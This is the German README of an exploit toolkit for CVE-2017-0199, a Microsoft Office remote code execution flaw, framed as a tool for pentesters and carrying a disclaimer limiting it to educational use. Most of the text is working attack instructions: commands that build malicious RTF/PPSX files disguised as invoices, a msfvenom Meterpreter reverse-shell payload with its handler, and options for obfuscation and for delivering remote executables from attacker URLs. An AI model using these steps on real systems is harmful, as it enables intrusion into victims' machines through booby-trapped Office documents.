
Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine schädliche RTF/PPSX-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer liefern.
Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine bösartige RTF/PPSX-Datei generieren und einen Metasploit / Meterpreter / anderen Payload an das Opfer liefern, ohne dass eine komplexe Konfiguration erforderlich ist.
Dieses Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (bhdresh) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionen entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder Missbrauch dieser Programme oder deren Ableitungen. Durch die Nutzung dieses Programms akzeptieren Sie, dass Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme entstehen, nicht in der Verantwortung von bhdresh liegen.
Abschließend handelt es sich um eine persönliche Entwicklung. Bitte respektieren Sie deren Philosophie und verwenden Sie sie nicht für schlechte Dinge!
CC BY 4.0 Lizenz - https://creativecommons.org/licenses/by/4.0/
Dem Skript wurden folgende Fähigkeiten hinzugefügt:
- Generieren einer bösartigen PPSX-Datei
- Exploit-Modus für generierte PPSX-Datei
- Aktualisierte Vorlage.ppsx
Version: Python-Version 2.7.13
1) Bösartige RTF-Datei generieren
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, falls MSF-Payload verwendet wird): Metasploit-Payload generieren und Handler starten
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Toolkit im Exploit-Modus starten, um lokalen Payload zu liefern
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) Bösartige RTF-Datei generieren
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Toolkit im Exploit-Modus starten, um Remote-Payload zu liefern
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) Bösartige RTF-Datei generieren
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Toolkit im Exploit-Modus starten, um benutzerdefinierte HTA-Datei zu liefern
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
Dies ist ein praktisches Toolkit zur Ausnutzung von CVE-2017-0199 (Microsoft Office RCE)
Modi:
-M gen Nur bösartige Datei generieren
Bösartige RTF/PPSX-Datei generieren:
-w <Dateiname.rtf/Dateiname.ppsx> Name der bösartigen RTF/PPSX-Datei (Diese Datei mit dem Opfer teilen).
-u <http://angreifer.com/test.hta> Der Pfad zu einer HTA/SCT-Datei. Normalerweise sollte dies eine Domain oder IP sein, unter der dieses Tool ausgeführt wird.
Beispiel: http://angreiferip.com/test.doc (Diese URL wird in die bösartige RTF/PPSX-Datei aufgenommen und angefordert, sobald das Opfer die bösartige RTF-Datei öffnet.)
-t RTF|PPSX (Standard = RTF) Typ der zu generierenden Datei.
-x 0|1 (Standard = 0) Verschleierte RTF-Datei generieren. 0 = Deaktivieren, 1 = Aktivieren.
-M exp Exploit-Modus starten
Ausnutzung:
-t RTF|PPSX (Standard = RTF) Typ der auszunutenden Datei.
-H </tmp/custom> Lokaler Pfad einer benutzerdefinierten HTA/SCT-Datei, die auf dem Ziel ausgeliefert und ausgeführt werden soll.
HINWEIS: Diese Option liefert keine Payloads, die über die Optionen "-e" und "-l" angegeben wurden.
-p <TCP-Port: Standard 80> Lokale Portnummer.
-e <http://angreifer.com/shell.exe> Der Pfad zu einer ausführbaren Datei / Meterpreter-Shell / Payload, die auf dem Ziel ausgeführt werden soll.
-l </tmp/shell.exe> Wenn der Payload lokal gehostet wird, geben Sie den lokalen Pfad einer ausführbaren Datei / Meterpreter-Shell / Payload an.
@nixawk für das RTF-Beispiel, @Li Haifei, @bhdresh
Offensichtlich bin ich kein Vollzeit-Entwickler, also erwarten Sie einige Hürden.
Bitte melden Sie Fehler und Probleme unter https://github.com/bhdresh/CVE-2017-0199/issues/new